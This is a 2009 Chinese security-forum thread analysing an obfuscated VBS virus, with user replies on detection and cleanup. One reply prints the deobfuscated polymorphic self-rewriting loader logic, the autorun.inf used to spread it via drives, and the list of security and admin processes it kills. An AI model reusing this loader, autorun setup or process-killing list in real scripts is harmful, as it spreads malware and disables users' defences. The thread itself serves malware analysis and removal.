很 囧 很囧的vbs病毒

824626242

EQ的清爽规则可以抵挡

jone_jys

靠 过去一天啦 ，NOD还没报毒呢

tgzw1680

不是ntfs格式的没什么很大问题。如果是ntfs的首先要找到几个数据流文件删除
%sys32%\smss.exe －－－C:\WINDOWS\system32\smss.exe:.vbs
%windir%\explorer.exe－－－C:\WINDOWS\explorer:.vbs
注册表写了很多主要是关于文件打开关联的，比如双击打开我的电脑，双击打开桌面上的ie。。。。还有很多，自己去找工具恢复关联吧。
恢复隐藏文件夹，简单点的就是cmd运行 attrib 盘符 /D /S -s -r -h
然后是删除建立的一堆快捷方式
自启动没仔细看，应该用了很简单的方法，第一个就是autorun.inf，还有就是写了一个注册表
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
基本上删除生成的数据流病毒文件，就解决了80%工作了。。。。。
昨天md实机操作。。。呵呵，所以稍微看了一下，md真的很好用。没防御住是我的问题，中标后清理是md很好用，顶一个

qq316107934

这是什么加密啊？是明文。怎么字符顺序是乱的？破解一点思路也没有。

是昔流芳

翻转一下再看一看

qq316107934

反转过了:
> 解密: 字符串翻转.
= 完成
结果：
8Next Resume On Error'

9Alert()Sub Virus'

4tionFuncEnd '
某些单词是对的，可顺序还是不对啊！
头一次见到明文加密的...

chabosh

'起乱偶给要不'文中的我，号外我，风暴叫字名B叫字名文英的.eniFyo-_- 7

qq316107934

破解成功了！！！！
病毒行为：

1. set 文件系统 = 创建对象("scripting.filesystemobject")
   
2. set 病毒文件=文件系统.打开文本文件(该脚本地址,1)
   
3. do until 病毒文件.读到结尾
   
4. 读取的临时文本=删除两端空格(病毒文件.读取一行)
   
5. if 左边(读取的临时文本,1)="'" then
   
6. 解码后的临时文本=解码函数(mid(读取的临时文本,2,取文本长度(读取的临时文本)-2),right(读取的临时文本,1))
   
7. 初始化随机数生成器
   
8. 2~8的随机数=取2~8的随机数
   
9. 重新打乱的临时文本="'"&解码函数(解码后的临时文本,2~8的随机数)&2~8的随机数
   
10. else
    
11. 重新打乱的临时文本=读取的临时文本
    
12. 重新打乱的临时文本=替换变量函数(重新打乱的临时文本)
    
13. 重新打乱的临时文本=随机大小写函数(重新打乱的临时文本)
    
14. end if
    
15. 真正病毒脚本=真正病毒脚本&解码后的临时文本&vbcrlf
    
16. 重新变形病毒脚本=重新变形病毒脚本&重新打乱的临时文本&vbcrlf
    
17. 解码后的临时文本=""
    
18. 重新打乱的临时文本=""
    
19. loop
    
20. set 病毒文件=文件系统.打开文本文件(该脚本地址,只写)
    
21. 病毒文件.写入 重新变形病毒脚本
    
22. 病毒文件.保存关闭
    
23. set 文件系统=nothing
    
24. 运行 真正病毒脚本
    
25. 
    
26. function 解码函数(乱码段,乱码索引)
    
27. for 循环控制变量=1 to 取文本长度(乱码段) step 乱码索引
    
28. 解码函数=解码函数+倒转文字(mid(乱码段,循环控制变量,乱码索引))
    
29. next
    
30. end function
    
31. 
    
32. function 随机大小写函数(更新的乱码段)
    
33. 初始化随机数生成器
    
34. for 循环控制变量=1 to 取文本长度(更新的乱码段)
    
35. 函数临时文本=mid(转换为大写(更新的乱码段),循环控制变量,1)
    
36. if 取随机真假 then
    
37. 函数临时文本=转换为小写(函数临时文本)
    
38. end if
    
39. 随机大小写函数=随机大小写函数&函数临时文本
    
40. next
    
41. end function
    
42. 
    
43. function 替换变量函数(新的乱码段)
    
44. 初始化随机数生成器
    
45. for 循环控制变量=0 to 13
    
46. 新的乱码段=替换(转换为大写(新的乱码段),转换为大写(转换为16进制字符串(<变为十六进制>文件系统+循环控制变量)),转换为大写(转换为16进制字符串(取24000~40960的随机数+循环控制变量)))
    
47. next
    
48. 替换变量函数=新的乱码段
    
49. end function

复制代码

Autorun.inf的：

1. [AutoRun]
   
2. 
   
3. Shellexecute=WScript.exe 53950193.vbs "AutoRun"
   
4. 
   
5. shell\open=打开(&O)
   
6. 
   
7. shell\open\command=WScript.exe 53950193.vbs "AutoRun"
   
8. 
   
9. shell\open\Default=1
   
10. 
    
11. shell\explore=资源管理器(&X)\
    
12. 
    
13. shell\explore\command=WScript.exe 53950193.vbs "AutoRun"

复制代码

每隔3秒(3000毫秒)结束如下进程:("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe","cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com","msconfig.exe")
解密文件见附件！

[ 本帖最后由 qq316107934 于 2009-10-4 20:12 编辑 ]

chabosh

楼上的真实高手啊！膜拜中。。。

zzhao

很麻烦的病毒